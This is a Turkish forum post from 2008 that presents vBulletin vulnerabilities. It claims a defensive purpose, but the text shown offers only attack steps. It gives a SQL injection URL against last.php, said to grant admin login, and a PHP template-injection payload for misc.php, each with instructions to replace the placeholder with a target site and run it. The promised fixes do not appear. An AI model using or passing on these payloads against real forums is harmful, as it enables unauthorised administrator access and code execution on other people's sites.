AnasayfaAnasayfa  Kayıt OlKayıt Ol  Giriş yapGiriş yap  

Paylaş | 
 

 VBulletin Açıkları Ve Kapama Yolları

Önceki başlık Sonraki başlık Aşağa gitmek 
YazarMesaj
Rıdvan®
admin
admin
avatar

Mesaj Sayısı : 53
Kayıt tarihi : 16/03/08

MesajKonu: VBulletin Açıkları Ve Kapama Yolları   Paz Mart 16, 2008 8:14 am

VBulletin’e Karşı Yapılabilecek Saldırılar;

Not: Aslında bu kısım hacking ağırlıklı ama bir hacker gibi düşünmeden kendinizi hackerlerden koruyamazsınız. Bu yazıyı hazırlamamın sebebi çoğu arkadaşımızın lamerler tarafından hacklenmesidir. Ve hangi açıklar yüzünden hacklendiklerini bilmemeleridir. Ayrıca acemilerin bazı yerleri anlamayacaklarını tahmin ediyorum. Sormak istediğiniz yerler olursa sorabilirsiniz.

Yazımın bundan sonraki bölümü hackerleri daha çok ilgilendiriyor J Şimdi başlıklar halinde sizlere vbulletinin birçok açığını anlatacağım; [NOT: Bazı açıklar çok eski olduğu için hedef site bulmak zor olabilir] Öncelikle SQL Enjeksiyon, RFI ve exploit açıkları ile başlıyorum;

1-) LAST.PHP Dosyasını SQL Enjeksiyona Uğratmak;

http://www.hedefsite.com/last.php?fs...title,user.%20 (http://www.hedefsite.com/last.php?fs...title,user.%20) %20%20%20username%20as%20lastposter%20FROM%20user, thread%20%20%20%20%20WHERE%20usergroupid=6%20LIMIT %201

Hedef site yerine hedef sitenizin adresini yazın ve URL’yi browserda çalıştırın. Eğer açık mevcutsa siteye admin olarak giriş yapabileceksiniz.

Açık Bulunma Tarihi: 2004-11-15

2-) MISC.PHP Dosyasını PHP Enjeksiyonuna Uğratmak;

Önemli : vBulletin 3.06 sürümü aşağısı için geçerlidir. 3.0.1’de test edilmiştir.

http://hedefsite.com/misc.php?do=page&template={${phpinfo()}}

Hedefsite kısmına saldırı yapacağınız siteyi yazıp URL’yi browserda çalıştırın.

Açık Bulunma Tarihi: 2005-02-22

3-) Avatarların İçine Kod Gizleyerek Üyeleri Log-out etmek [ =<---3.0.7 versiyon]
Sayfa başına dön Aşağa gitmek
 
VBulletin Açıkları Ve Kapama Yolları
Önceki başlık Sonraki başlık Sayfa başına dön 
1 sayfadaki 1 sayfası

Bu forumun müsaadesi var:Bu forumdaki mesajlara cevap veremezsiniz
 :: WEP HACKİNG-
Buraya geçin: